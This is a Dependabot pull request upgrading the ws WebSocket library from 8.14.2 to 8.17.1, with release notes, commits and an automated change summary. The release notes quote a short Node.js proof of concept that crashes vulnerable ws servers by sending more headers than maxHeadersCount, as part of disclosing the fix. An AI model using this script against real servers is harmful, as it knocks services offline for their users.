Bump ws from 8.14.2 to 8.17.1

[dependabot]

Bumps ws from 8.14.2 to 8.17.1.

Release notes

Sourced from ws's releases.

8.17.1

Bug fixes

• Fixed a DoS vulnerability (#2231).

A request with a number of headers exceeding the[server.maxHeadersCount][] threshold could be used to crash a ws server.

const http = require('http');
const WebSocket = require('ws');
const wss = new WebSocket.Server({ port: 0 }, function () {
const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
const headers = {};
let count = 0;
for (let i = 0; i < chars.length; i++) {
if (count === 2000) break;
for (let j = 0; j &lt; chars.length; j++) {
  const key = chars[i] + chars[j];
  headers[key] = 'x';
if (++count === 2000) break;
}

}
headers.Connection = 'Upgrade';
headers.Upgrade = 'websocket';
headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
headers['Sec-WebSocket-Version'] = '13';
const request = http.request({
headers: headers,
host: '127.0.0.1',
port: wss.address().port
});
request.end();
});

The vulnerability was reported by Ryan LaPointe in websockets/ws#2230.

In vulnerable versions of ws, the issue can be mitigated in the following ways:

1. Reduce the maximum allowed length of the request headers using the [--max-http-header-size=size][] and/or the [maxHeaderSize][] options so that no more headers than the server.maxHeadersCount limit can be sent.

... (truncated)

Commits

• 3c56601 [dist] 8.17.1
• e55e510 [security] Fix crash when the Upgrade header cannot be read (#2231)
• 6a00029 [test] Increase code coverage
• ddfe4a8 [perf] Reduce the amount of crypto.randomFillSync() calls
• b73b118 [dist] 8.17.0
• 29694a5 [test] Use the highWaterMark variable
• 934c9d6 [ci] Test on node 22
• 1817bac [ci] Do not test on node 21
• 96c9b3d [major] Flip the default value of allowSynchronousEvents (#2221)
• e5f32c7 [fix] Emit at most one event per event loop iteration (#2218)
• Additional commits viewable in compare view

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.

---

Dependabot commands and options

You can trigger Dependabot actions by commenting on this PR:

• @dependabot rebase will rebase this PR
• @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
• @dependabot merge will merge this PR after your CI passes on it
• @dependabot squash and merge will squash and merge this PR after your CI passes on it
• @dependabot cancel merge will cancel a previously requested merge and block automerging
• @dependabot reopen will reopen this PR if it is closed
• @dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
• @dependabot show <dependency name> ignore conditions will show all of the ignore conditions of the specified dependency
• @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
• @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
• @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
  You can disable automated security fix PRs for this repo from the Security Alerts page.

[github-actions]

[puLL-Merge] - websockets/ws@8.14.2..8.17.1

Description

This pull request introduces several updates to the websockets/ws repository, focusing mainly on the following areas:

1. Migration from .eslintrc.yaml to eslint.config.js.
2. Continuous integration (CI) workflow improvements.
3. Code refactoring and the addition of new options for WebSocket and WebSocketServer.
4. Enhancements to the README.md documentation.
5. Updates to the test cases for broader test coverage and alignment with new changes.
6. Version bump for the package.

Possible Issues

1. Deprecation Warnings: The new parameter allowSynchronousEvents may cause unexpected behavior if existing applications rely on synchronous events.
2. Backward Compatibility: The changes in how errors are handled in receiver.js could introduce issues in applications that expect different error handling or messaging patterns.

Security Hotspots

None identified. The changes focus primarily on configuration management, refactoring, and enhanced option handling without introducing new external inputs or processing mechanisms that could introduce security vulnerabilities.

Changes

Changes

.github/workflows/ci.yml

• Added support for Node.js version 22.
• Updated actions/setup-node from version v3 to v4.

README.md

• Provided clarification and additional sections to documentation.
• Introduced a new "Legacy opt-in for performance" section.
• Corrected grammatical mistakes across the documentation.

SECURITY.md

• Minor grammar corrections for better readability.

doc/ws.md

• Introduced new options: autoPong and allowSynchronousEvents.
• Enhanced documentation for clarity.

eslint.config.js

• Added new ESLint configuration file replacing the deprecated .eslintrc.yaml.
• Set up modern JavaScript linting standards with Prettier integration.

FUNDING.json

• Added Ethereum funding details for Drips.

lib/receiver.js

• Substantial refactoring for error handling and state management.
• Added support for new allowSynchronousEvents and autoPong options.
• Replaced complex microtask queuing logic with simplified state management.

lib/sender.js

• Introduced pooling for random data generation to optimize performance.

lib/websocket-server.js, lib/websocket.js

• Added new options allowSynchronousEvents and autoPong.
• Enhanced error handling for missing or invalid headers.

package.json

• Updated the package version from 8.14.2 to 8.17.1.
• Updated dependencies and development dependencies.
• Simplified linting script in scripts.

Tests

• Modified and added new test cases in:
  • test/create-websocket-stream.test.js
  • test/receiver.test.js
  • test/websocket-server.test.js
  • test/websocket.test.js
• Improved coverage for new features and added necessary assertions to validate new behavior.

Overall, these changes improve the quality, consistency, and reliability of the library while also enhancing documentation and support for the latest Node.js versions.